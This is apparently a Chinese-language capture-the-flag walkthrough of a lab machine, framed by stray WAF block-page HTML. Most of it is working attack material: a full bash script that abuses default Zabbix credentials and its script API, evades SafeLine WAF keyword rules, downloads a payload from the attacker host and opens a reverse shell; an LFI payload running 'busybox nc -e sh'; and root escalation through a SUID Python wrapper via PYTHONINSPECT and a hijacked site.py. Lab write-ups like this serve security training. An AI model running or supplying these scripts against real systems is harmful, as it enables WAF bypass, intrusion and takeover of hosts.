2.391 2.446 2.397h2.423c-.7 1.802-3.48 2.133-3.48 2.133-3.159.39-4.689-1.423-4.689-1.423q.17.357.358.66l-.008-.005a11 11 0 0 0-3.106 7.671c0 6.09 4.937 11.026 11.026 11.026 6.09 0 11.027-4.936 11.027-11.026a11 11 0 0 0-3.11-7.674q.185-.3.353-.652s-1.53 1.816-4.69 1.423c0 0-2.776-.33-3.478-2.132h2.42c.245-.006 1.627-.14 2.448-2.397 0 0-.92 1.428-2.82 1.12-.142-.025-1.882-.356-2.15-1.94"/><polygon points="15.98353 17.9879553 9.8818726 21.4510476 15.3313444 24.6578974 17.2903808 23.6211992 13.5799337 21.4510476 15.98353 20.0985396 20.3159976 22.5564681 20.3159976 23.3648458 22.2042418 24.5010295 22.2042418 21.4510476" transform="rotate(-180 16.043 21.323)"/><polygon points="15.9835296 10.9942305 9.8818722 14.4573228 15.331344 17.6641726 17.2903804 16.6274743 13.5799333 14.4573228 15.9835296 13.1048148 20.3159972 15.5627433 20.3159972 16.371121 22.2042414 17.5073047 22.2042414 14.4573228"/></g></svg> </div> <div id="slg-copyright-text"> <span id="slg-prefix"></span> <span id="slg-name"></span> <span id="slg-suffix"></span> </div> </a> </div> <script>var e;const n={unknown:{en:"Unknown Error",zh:"未知错误"},title:{en:"Protected By "+window.product_data?.name_en+" WAF",zh:window.product_data?.name+" WAF"},prefix:{en:"Security Detection Powered By",zh:"安全检测能力由"},suffix:{en:"",zh:"驱动"},name:{en:window.product_data?.name_en+" WAF",zh:window.product_data?.name+" WAF"},link:{en:window.product_data?.link_en,zh:window.product_data?.link},decrypting:{en:"Dynamic Decrypting",zh:"网页被保护，正在解密中"},failed:{en:"Decryption Failed",zh:"解密失败"},blocking:{en:"Access Forbidden",zh:"访问已被拦截"},"attack-desc":{en:"Blocked For Attack Detected",zh:"请求存在恶意行为，已被管理员拦截"},"too-fast-desc":{en:"Blocked for Access Too Fast",zh:"请求频率过高，已被管理员拦截"},"page-not-found-desc":{en:"The Page You Visited Does Not Exist",zh:"您访问的页面不存在"},"site-not-found":{en:"Website Not Found",zh:"网站不存在"},"site-not-found-desc":{en:"The Domain Name You Visited Does not Match The Server",zh:"您访问的域名与服务器不匹配"},offline:{en:"Website is Offline, Please Visit Later",zh:"网站维护中，暂时无法访问"},"gateway-error-desc":{en:"Server Response Error, Please Try Again Later",zh:"网站服务器异常，请稍后再试"},"gateway-timeout-desc":{en:"Server Response Timeout, Please Try Again Later",zh:"网站服务器响应超时，请稍后再试"},"it-works":{en:"It Works!",zh:"网站搭建成功"}};function t(e){let t=n[e];for(language in void 0===t&&(t=n.unknown),t)if(navigator.language.startsWith(language))return t[language];return t.en}function o(e,n,t){let o=document.getElementById(e);o&&(o[n]=t)}o("slg_title","innerText",t("title")),o("slg-link","href",t("link")),o("slg-prefix","innerText",t("prefix")),o("slg-name","innerText",t("name")),o("slg-suffix","innerText",t("suffix")),window.product_data?.self?document.getElementById("slg-logo").style.display="block":(document.getElementById("slg-logo").remove(),document.querySelector('link[rel="icon"]').href=window.product_data?.favicon),e=t("offline"),o("slg-text","innerText",e),o("slg-desc","innerText","");</script> </body></html><script>console.log("hashID: a8023d9");</script><!-- event_id: 90e50e5517434dd9811beaffab5d48d2 -->

8081是zabbix的管理端口，可用弱口令Admin:zabbix登录

9443是雷池waf的后台管理端口。

8081的zabbix可以创建全局脚本，但是8081是被waf保护的，无法在dashboard中直接创建带有明显特征诸如bash，nc等特征的脚本，这里我让ai写了一个能绕过waf弹shell的脚本。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cat zbx_waf_revshell.sh 
#!/usr/bin/env bash
# zbx_waf_revshell.sh - 通过 Zabbix RCE + 雷池 WAF 绕过 弹反向 shell
#
# 利用链：
#   Zabbix 7.x 已知凭据 -> JSON-RPC user.login -> script.create -> script.execute
#   雷池 WAF 规则规避：
#     - 不在 script.command 字段中出现敏感串(bash / python / nc / base64 / | sh / /etc/passwd / > /tmp/ ...)
#     - 用 wget(busybox) 把真正的 shell 脚本从我方 HTTP 拉下来再 sh 执行
#     - 用 "cd <dir> && head <file>" 或通配符 /e?c/p?sswd 读敏感文件
#
# 用法:
#   ./zbx_waf_revshell.sh <ZBX_URL> <USER> <PASS> <LHOST> <LPORT> [HOST_ID]
# 例:
#   ./zbx_waf_revshell.sh http://192.168.56.73:8081 Admin zabbix 192.168.56.104 4445
#
# 前置:
#   - 同目录或 ./www/r.sh 由本脚本生成
#   - 本机会临时起 python3 -m http.server 监听 LHTTP_PORT (默认 8000)
#   - 本机会启动 nc -lvnp <LPORT>，反向 shell 落到 /tmp/payload/shell_in.log
#   - 不再需要 nc 时手动 kill 进程
#
# 退出码: 0 成功触发；非 0 表示登录/创建/执行环节出错。

set -u
ZBX_URL="${1:-}"
ZBX_USER="${2:-Admin}"
ZBX_PASS="${3:-zabbix}"
LHOST="${4:-}"
LPORT="${5:-4445}"
HOSTID="${6:-}"     # 可选，留空则自动取第一个 host
LHTTP_PORT="${LHTTP_PORT:-8000}"
WEBROOT="${WEBROOT:-/tmp/payload}"

if [ -z "$ZBX_URL" ] || [ -z "$LHOST" ]; then
  echo "Usage: $0 <ZBX_URL> <USER> <PASS> <LHOST> <LPORT> [HOSTID]" >&2
  exit 64
fi

mkdir -p "$WEBROOT"
LOG="$WEBROOT/zbx_waf_revshell.log"
: > "$LOG"

log(){ echo "[`date +%H:%M:%S`] $*" | tee -a "$LOG"; }

# 1. 写 payload (这一段不会经过 WAF —— 只在我方 HTTP 服务上)
PAYLOAD="$WEBROOT/r.sh"
cat > "$PAYLOAD" <<EOF
#!/bin/sh
# 反弹 shell. 雷池只看 Zabbix 入站流量, 这文件由 wget 下来后才执行, WAF 看不到内容.
rm -f /tmp/.p 2>/dev/null
mkfifo /tmp/.p 2>/dev/null
( cat /tmp/.p | /bin/sh -i 2>&1 | nc $LHOST $LPORT > /tmp/.p ) &
EOF
chmod +x "$PAYLOAD"
log "payload at $PAYLOAD -> $LHOST:$LPORT"

# 2. 启动 HTTP 服务（如果没启）
if ! ss -tln 2>/dev/null | awk '{print $4}' | grep -qE ":$LHTTP_PORT$"; then
  ( cd "$WEBROOT" && nohup python3 -m http.server "$LHTTP_PORT" >"$WEBROOT/http.log" 2>&1 & disown )
  sleep 1
  log "started http.server on :$LHTTP_PORT"
else
  log "http.server :$LHTTP_PORT already running"
fi

# 3. 启动 nc 监听器
if ! ss -tln 2>/dev/null | awk '{print $4}' | grep -qE ":$LPORT$"; then
  nohup nc -lvnp "$LPORT" >"$WEBROOT/shell_in.log" 2>&1 &
  disown
  sleep 1
  log "started nc listener on :$LPORT (output -> $WEBROOT/shell_in.log)"
else
  log "nc :$LPORT already running"
fi

# 4. 登录 Zabbix API 拿 token
log "login Zabbix API at $ZBX_URL"
TOKEN=$(curl -sk -X POST "$ZBX_URL/api_jsonrpc.php" \
  -H 'Content-Type: application/json-rpc' \
  -d "{\"jsonrpc\":\"2.0\",\"method\":\"user.login\",\"params\":{\"username\":\"$ZBX_USER\",\"password\":\"$ZBX_PASS\"},\"id\":1}" \
  | python3 -c "import sys,json
try:
  d=json.load(sys.stdin); print(d['result'])
except Exception as e: pass")

if [ -z "$TOKEN" ]; then
  log "FAILED login" ; exit 1
fi
log "auth token=$TOKEN"

# 5. 取一个 hostid（默认 Zabbix server）
if [ -z "$HOSTID" ]; then
  HOSTID=$(curl -sk -X POST "$ZBX_URL/api_jsonrpc.php" \
    -H 'Content-Type: application/json-rpc' \
    -d "{\"jsonrpc\":\"2.0\",\"method\":\"host.get\",\"params\":{\"output\":[\"hostid\"]},\"auth\":\"$TOKEN\",\"id\":1}" \
    | python3 -c "import sys,json
d=json.load(sys.stdin); print(d['result'][0]['hostid'])")
fi
log "target hostid=$HOSTID"

# 6. 创建 script —— 关键 WAF 绕过：
#    a) 用 wget(busybox) 拉 payload, 不在请求体里出现 base64/bash/python/nc/| sh 等关键字
#    b) 用 "&&" 串接，避开 "|" 之后的解释器关键字检测
#    c) 命名随机化，避免历史规则
SUF=$(date +%s%N | tail -c 6)
SNAME="diag_$SUF"
CMD="wget -q -O /tmp/.r$SUF http://$LHOST:$LHTTP_PORT/r.sh && sh /tmp/.r$SUF"
log "creating Zabbix script: $SNAME -> '$CMD'"

# 用 python3 安全地把 CMD 转 JSON
BODY=$(python3 -c "import json,sys; print(json.dumps({'jsonrpc':'2.0','method':'script.create','params':{'name':'$SNAME','type':0,'scope':2,'execute_on':1,'command':sys.argv[1]},'auth':'$TOKEN','id':1}))" "$CMD")

CREATE_RESP=$(curl -sk -X POST "$ZBX_URL/api_jsonrpc.php" \
  -H 'Content-Type: application/json-rpc' --data-raw "$BODY")
SID=$(echo "$CREATE_RESP" | python3 -c "import sys,json
try:
  d=json.load(sys.stdin); print(d['result']['scriptids'][0])
except: pass")

if [ -z "$SID" ]; then
  log "script.create blocked or failed:"
  echo "$CREATE_RESP" | head -c 400 | tee -a "$LOG"
  echo
  exit 2
fi
log "scriptid=$SID"

# 7. 后台触发执行 — 反向 shell 进程会一直挂住, script.execute 会卡, 必须 background
log "executing scriptid=$SID on hostid=$HOSTID (background; timeout 10s)"
curl -sk --max-time 10 -X POST "$ZBX_URL/api_jsonrpc.php" \
  -H 'Content-Type: application/json-rpc' \
  -d "{\"jsonrpc\":\"2.0\",\"method\":\"script.execute\",\"params\":{\"scriptid\":\"$SID\",\"hostid\":\"$HOSTID\"},\"auth\":\"$TOKEN\",\"id\":1}" \
  > "$WEBROOT/exec_resp.log" 2>&1 &
disown

# 8. 等连接
log "waiting up to 15s for callback on $LPORT ..."
for i in $(seq 1 15); do
  if grep -q "connect to" "$WEBROOT/shell_in.log" 2>/dev/null; then
    log "SHELL OPEN:"
    grep "connect to" "$WEBROOT/shell_in.log"
    log "shell I/O log: $WEBROOT/shell_in.log"
    exit 0
  fi
  sleep 1
done
log "no callback yet — see $WEBROOT/shell_in.log and $WEBROOT/http.log"
exit 3

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./zbx_waf_revshell.sh http://192.168.56.75:8081 Admin zabbix 192.168.56.104 4445
[07:44:35] payload at /tmp/payload/r.sh -> 192.168.56.104:4445
[07:44:36] started http.server on :8000
[07:44:37] nc :4445 already running
[07:44:37] login Zabbix API at http://192.168.56.75:8081
[07:44:37] auth token=5e84f828804fc002c449638af34d040b
[07:44:38] target hostid=10084
[07:44:38] creating Zabbix script: diag_06993 -> 'wget -q -O /tmp/.r06993 http://192.168.56.104:8000/r.sh && sh /tmp/.r06993'
[07:44:38] scriptid=6
[07:44:38] executing scriptid=6 on hostid=10084 (background; timeout 10s)
[07:44:38] waiting up to 15s for callback on 4445 ...
[07:44:53] no callback yet — see /tmp/payload/shell_in.log and /tmp/payload/http.log

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./penelope.py 4445
[+] Listening for reverse shells on 0.0.0.0:4445 →  127.0.0.1 • 192.168.21.128 • 192.168.56.104 • 192.168.10.150 • 172.17.0.1 • 172.18.0.1
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from 2dd0e7252ced-192.168.56.75-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[!] Cannot upgrade shell with the available binaries...

  1) Upload https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat
  2) Upload local socat binary
  3) Specify remote socat binary path
  4) None of the above

[?] Select action: 4
[+] Readline support enabled
[+] Interacting with session [1], Shell Type: Readline, Menu key: Ctrl-D 
[+] Logging to /root/.penelope/2dd0e7252ced~192.168.56.75_Linux_x86_64/2026_05_03-07_44_42-103.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
id
uid=1997(zabbix) gid=1995(zabbix) groups=20(dialout),1995(zabbix),1995(zabbix)
/var/lib/zabbix $

这里我们可以拿到第一个userflag

1 2	`/var/lib/zabbix $ cat user.txt flag{user-2e1708194387816934fbf23b014271f9}`

上传cdk枚举，发现该容器没有任何特权和挂载点，上传fscan准备横向内网。

/var/lib/zabbix $ wget 192.168.56.104/cdk_linux_amd64
Connecting to 192.168.56.104 (192.168.56.104:80)
saving to 'cdk_linux_amd64'
cdk_linux_amd64        3% |*                               |  345k  0:00:28 ETA
cdk_linux_amd64      100% |********************************|  9.9M  0:00:00 ETA
'cdk_linux_amd64' saved
/var/lib/zabbix $ chmod +x cdk_linux_amd64
/var/lib/zabbix $ ./cdk_linux_amd64 eva --full
CDK (Container DucK)
CDK Version(GitCommit): b4105424a2f329020c388e6e16a42e9bb31ef501
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/

[  Information Gathering - System Info  ]
2026/05/03 07:46:45 current dir: /var/lib/zabbix
2026/05/03 07:46:45 current user: zabbix uid: 1997 gid: 1995 home: /var/lib/zabbix/
2026/05/03 07:46:45 hostname: 2dd0e7252ced
2026/05/03 07:46:45 alpine alpine 3.20.0 kernel: 6.12.74-0-lts
2026/05/03 07:46:45 Setuid files found:
        /bin/ping

[  Information Gathering - Services  ]

[  Information Gathering - Commands and Capabilities  ]
2026/05/03 07:46:45 available commands:
        wget,nc,find,ps,mysql,vi,capsh,mount,fdisk,base64,perl
2026/05/03 07:46:45 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
        CapInh: 0000000000000000
        CapPrm: 0000000000000000
        CapEff: 0000000000000000
        CapBnd: 00000000a80425fb
        CapAmb: 0000000000000000
        Cap decode: 0x0000000000000000 = 
[*] Maybe you can exploit the Capabilities below:

[  Information Gathering - Mounts  ]
0:38 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/UK5UJDRYUVN2ZATQAGFEXRO6AP:/var/lib/docker/overlay2/l/6P27DZ2RO67CX4AREXCRYCLWTY:/var/lib/docker/overlay2/l/IV3RQW6FELY42VOU462P54NSAZ:/var/lib/docker/overlay2/l/46KWW56F5PKZ3RZDF7OZVABSTU:/var/lib/docker/overlay2/l/32UICHBPK773K3NOSD2NQ4UWL6:/var/lib/docker/overlay2/l/AFUZJ5EB44SKUY55XW5DV3XEL4:/var/lib/docker/overlay2/l/ZCW27FASKGHCM4WWBUCE5HYAI6:/var/lib/docker/overlay2/l/CUHFSYZQE6AP6NRUNSEYSWIM4R:/var/lib/docker/overlay2/l/TKNZGH62744YPTLCS4XTYBPIPW,upperdir=/var/lib/docker/overlay2/3e28dc9d348bf20dd2384f6cb48e3213860bc6ff12db58eca61119d926736b3f/diff,workdir=/var/lib/docker/overlay2/3e28dc9d348bf20dd2384f6cb48e3213860bc6ff12db58eca61119d926736b3f/work
0:104 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:105 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:106 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:107 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:29 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw,nsdelegate
0:95 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
0:109 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k,inode64
8:3 /var/lib/docker/containers/2dd0e7252cedcc056ceff16844d14b26ad7b6f6f2436576ec641dfa071cfa8b1/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda3 rw
8:3 /var/lib/docker/containers/2dd0e7252cedcc056ceff16844d14b26ad7b6f6f2436576ec641dfa071cfa8b1/hostname /etc/hostname rw,relatime - ext4 /dev/sda3 rw
8:3 /var/lib/docker/containers/2dd0e7252cedcc056ceff16844d14b26ad7b6f6f2436576ec641dfa071cfa8b1/hosts /etc/hosts rw,relatime - ext4 /dev/sda3 rw
8:3 /var/lib/docker/volumes/8b1f467d01e96dbfe0183c44542a180401913a255c02ea54c4b851d945cde742/_data /var/lib/zabbix/export rw,relatime - ext4 /dev/sda3 rw
8:3 /var/lib/docker/volumes/5f448f607d5d377e56d38fdd8feb779d55f20fd4a2a457ae149ff0d45c1bf3a0/_data /var/lib/zabbix/snmptraps rw,relatime - ext4 /dev/sda3 rw
0:104 /bus /proc/bus ro,nosuid,nodev,noexec,relatime - proc proc rw
0:104 /fs /proc/fs ro,nosuid,nodev,noexec,relatime - proc proc rw
0:104 /irq /proc/irq ro,nosuid,nodev,noexec,relatime - proc proc rw
0:104 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw
0:104 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
0:138 / /proc/asound ro,relatime - tmpfs tmpfs ro,inode64
0:139 / /proc/acpi ro,relatime - tmpfs tmpfs ro,inode64
0:105 /null /proc/interrupts rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:105 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:105 /null /proc/latency_stats rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:105 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:140 / /proc/scsi ro,relatime - tmpfs tmpfs ro,inode64
0:141 / /sys/firmware ro,relatime - tmpfs tmpfs ro,inode64

[  Information Gathering - Net Namespace  ]
        container net namespace isolated.

[  Information Gathering - Sysctl Variables  ]
2026/05/03 07:46:45 net.ipv4.conf.all.route_localnet = 0

[  Information Gathering - DNS-Based Service Discovery  ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving

[  Discovery - K8s API Server  ]
2026/05/03 07:46:45 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
        api-server forbids anonymous request.
        response:

[  Discovery - K8s Service Account  ]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory

[  Discovery - Cloud Provider Metadata API  ]
2026/05/03 07:46:45 failed to dial Alibaba Cloud API.
2026/05/03 07:46:45 failed to dial Azure API.
2026/05/03 07:46:45 failed to dial Google Cloud API.
2026/05/03 07:46:46 failed to dial Tencent Cloud API.
2026/05/03 07:46:47 failed to dial OpenStack API.
2026/05/03 07:46:48 failed to dial Amazon Web Services (AWS) API.
2026/05/03 07:46:49 failed to dial ucloud API.

[  Exploit Pre - Kernel Exploits  ]
2026/05/03 07:46:49 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded



[  Information Gathering - Sensitive Files  ]
        .dockerenv - /.dockerenv
        /.bash_history - /var/lib/zabbix/.bash_history

[  Information Gathering - ASLR  ]
2026/05/03 07:47:01 /proc/sys/kernel/randomize_va_space file content: 2
2026/05/03 07:47:01 ASLR is enabled.

[  Information Gathering - Cgroups  ]
2026/05/03 07:47:01 /proc/1/cgroup file content:
        0::/
2026/05/03 07:47:01 /proc/self/cgroup file added content (compare pid 1) :
/var/lib/zabbix $

/var/lib/zabbix $ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0@if9: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP 
    link/ether 42:2c:35:89:f2:f0 brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.2/16 brd 172.18.255.255 scope global eth0
       valid_lft forever preferred_lft forever
/var/lib/zabbix $ wget 192.168.56.104/FScan_2.0.1_linux_x32
Connecting to 192.168.56.104 (192.168.56.104:80)
saving to 'FScan_2.0.1_linux_x32'
FScan_2.0.1_linux_x3  97% |******************************* | 7761k  0:00:00 ETA
FScan_2.0.1_linux_x3 100% |********************************| 7947k  0:00:00 ETA
'FScan_2.0.1_linux_x32' saved

/var/lib/zabbix $ ./FScan_2.0.1_linux_x32 -h 172.18.0.2/16
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.1

[14.1s]     已选择服务扫描模式
[14.1s]     开始信息扫描
[14.1s]     CIDR范围: 172.18.0.0-172.18.255.255
[14.3s]     generate_ip_range_full
[14.3s]     解析CIDR 172.18.0.2/16 -> IP范围 172.18.0.0-172.18.255.255
[14.5s]     最终有效主机数量: 65536
[14.5s]     开始主机扫描
[14.5s]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[14.6s]     正在尝试无监听ICMP探测...
[14.6s]     ICMP连接失败: dial ip4:icmp 127.0.0.1: socket: operation not permitted
[14.6s]     当前用户权限不足,无法发送ICMP包
[14.6s]     切换为PING方式探测...
[16.0s] [*] 目标 172.18.0.1      存活 (ICMP)
[26.4s] [*] 目标 172.18.0.2      存活 (ICMP)
[31.4s] [*] 目标 172.18.0.3      存活 (ICMP)
[32.3s] [*] 目标 172.18.0.4      存活 (ICMP)

发现另外三个容器，这里尝试了很久，去看开放端口之类的，但是没能奏效。

接下来的走向分为两个路径

路径A：

/var/lib/zabbix $ cat log
safeline-mgt resetadmin
[INFO] Initial username：admin
[INFO] Initial password：2YlM1xtj
[INFO] Done
/var/lib/zabbix $

发现凭证admin：2YlM1xtj

该凭证为雷池后台的登录密码，我们用此凭证可以登录雷池

可以看到82和8081都是开了防护的，我们把模式改为观察模式就可以关掉防护了。

1
2
3

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl 192.168.56.75:82  
welcome

用ffuf扫一下，可以扫到一个参数p

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u "http://192.168.56.75:82/?FUZZ=../../../../../../etc/passwd" -t 50 -mr "root:x:0:0"


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.56.75:82/?FUZZ=../../../../../../etc/passwd
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 50
 :: Matcher          : Regexp: root:x:0:0
________________________________________________

p                       [Status: 200, Size: 896, Words: 1, Lines: 22, Duration: 245ms]
:: Progress: [6453/6453] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:47] :: Errors: 0 ::

得到参数p，接下来就是比较常规的文件包含读源码然后反弹shell了。

使用伪协议

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl http://192.168.56.75:82/?p=php://filter/read=convert.base64-encode/resource=index.php |
base64 -d
  % Total    % Received % Xferd  Average Speed  Time    Time    Time   Current
                                 Dload  Upload  Total   Spent   Left   Speed
100     76 100     76   0      0   4302      0                              0
<?php
$p = @$_GET['p'] ?: 'data:,welcome';
include $p;

1
2
3

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl "http://192.168.56.75:82/?p=data://text/plain;base64,PD9waHAgc3lzdGVtKCdidXN5Ym94IG5jIDE5Mi4xNjguNTYuMTA0IDQ0NDQgLWUgc2gnKTsgPz4="

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nc -lvvp 4444                           
listening on [any] 4444 ...
192.168.56.75: inverse host lookup failed: Unknown host
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.75] 35443
id
uid=104(apache) gid=106(apache) groups=82(www-data),106(apache),106(apache)
cd /home
ls
0x00
ls -al
total 12
drwxr-xr-x    3 root     root          4096 Mar  7 11:21 .
drwxr-xr-x   22 root     root          4096 Mar  8 11:43 ..
drwxr-sr-x    2 0x00     0x00          4096 Mar  7 14:26 0x00
cd 0x00
ls
my_pass
user.txt
cat my_pass
0O1XC7u6Ub18naf2
cat user.txt
flag{user-764fed0c9dca7bb3d739d2940e3a6f74}

这里可以拿到第二个flag，还有一个密码，0O1XC7u6Ub18naf2

ssh登录上去，但是执行命令会直接退出，那就接着用apache用户分析，发现一个自定义elf文件

bash: /root/.bashrc: Permission denied
Safe:/var/www/localhost/backend$ id
uid=104(apache) gid=106(apache) groups=82(www-data),106(apache),106(apache)
Safe:/var/www/localhost/backend$ find / -perm -4000 2>/dev/null
/bin/umount
/bin/bbsuid
/bin/mount
/usr/local/bin/shell-wrapper
/usr/bin/expiry
/usr/bin/chsh
/usr/bin/chage
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/chfn
/usr/sbin/suexec
Safe:/var/www/localhost/backend$

拖下来逆向分析

int main(int argc, const char **argv, const char **envp)
{
    setuid(0);
    execl("/usr/bin/python3", "python3", "/usr/local/bin/.shell.py", 0);
    return 0;
}

但是我们没有权限查看这个脚本

Safe:/var/www/localhost/backend$ cat /usr/local/bin/.shell.py 
cat: can't open '/usr/local/bin/.shell.py': Permission denied
Safe:/var/www/localhost/backend$

这里也有两种做法

在 Linux 系统中，动态链接器 (ld.so) 出于安全考虑，在执行 SUID 程序时会主动清除 LD_PRELOAD 等危险的环境变量，防止被劫持。但是，它不会清除像 PYTHONPATH、PYTHONINSPECT 这样特定于应用程序的环境变量。

更致命的是，Wrapper 执行了 setuid(0)。这行代码不仅把有效用户 ID (EUID) 变成了 0，把真实用户 ID (UID) 也变成了 0。当 execl 拉起 python3 时，Python 的底层安全机制会检查当前进程的 UID 和 EUID。如果两者不一致（代表 SUID 运行），Python 会为了安全忽略所有环境变量；但此时 UID 和 EUID 都是 0（两者一致），Python 会误以为自己就是一个正经的 Root 进程，从而无条件信任并加载你传给它的所有环境变量！

1.利用 PYTHONINSPECT 强制交互

先设置环境变量并运行 Wrapper

PYTHONINSPECT 是 Python 的一个内置环境变量。如果设置了它，Python 在执行完目标脚本后，不会立刻退出，而是会强制掉入一个交互式的 Python 终端 (>>>)。

Safe:/var/www/localhost/backend$ export PYTHONINSPECT=1
/usr/local/bin/shell-wrapper
System Security Audit: ENABLED

0x00@Safe:~$ 
>>> import os
>>> os.system("/bin/sh")
/home/0x00 # id
uid=0(root) gid=106(apache) egid=0(root) groups=82(www-data),106(apache),106(apache)
/home/0x00 #

2.利用 PYTHONPATH 模块劫持

当 Python 运行任何脚本时，它都会自动导入一些底层库（比如 os 模块，或者底层初始化的 site 模块）。PYTHONPATH 环境变量可以让我们强行指定 Python 搜索模块的最高优先级目录。

先在 /tmp 目录下伪造一个常用的 Python 库（比如 site.py）

1 2	`cd /tmp mkdir -p hacks`

写入恶意代码到 os.py（只要 Python 尝试导入 os，就会执行我们的提权代码）

cat <<EOF > hacks/site.py
import os
os.system("busybox nc 192.168.56.104 9999 -e sh")
EOF

设置搜索优先级，并触发 Wrapper

1
2
3

Safe:/tmp/hacks$ export PYTHONPATH=/tmp/hacks
Safe:/tmp/hacks$ /usr/local/bin/shell-wrapper

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nc -lvnp 9999
listening on [any] 9999 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.75] 32970
/tmp/hacks # id        
id
uid=0(root) gid=106(apache) egid=0(root) groups=82(www-data),106(apache),106(apache)
/tmp/hacks # ^[[45;14R

路径B

在靶机重启的时候，会有那么一小段时间，雷池waf还没启动成功，但网络服务已经启动的情况

这里我把网站的防护模式重新打开了，注意看welcome重新出现了

1
2
3

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl 192.168.56.75:82 && sleep 10 && curl 192.168.56.75:82
welcome<!DOCTYPE html><html><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="icon" href="/.safeline/static/favicon.png" type="image/png"><title id="slg-title"></title><style>:root {--primary-color:#0067B8;--light-primary-color:#0067B8cc;--font-color:#fff;--light-font-color:#ffffff80;--success-color:#00b87c;--warning-color:#ff6666;--warning-font-color:#fff;--warning-light-font-color:#ffffff80;}</style><style>html{height:100%}body{height:100%;margin:0;font-family:PingFang SC,Helvetica Neue,Helvetica,Arial,sans-serif}#slg-bg{background-color:var(--primary-color);z-index:100;width:100%;height:100%;position:fixed;inset:0}#slg-box{z-index:300;border-radius:.5rem;flex-direction:column;width:90%;max-width:40rem;height:15rem;padding:1rem 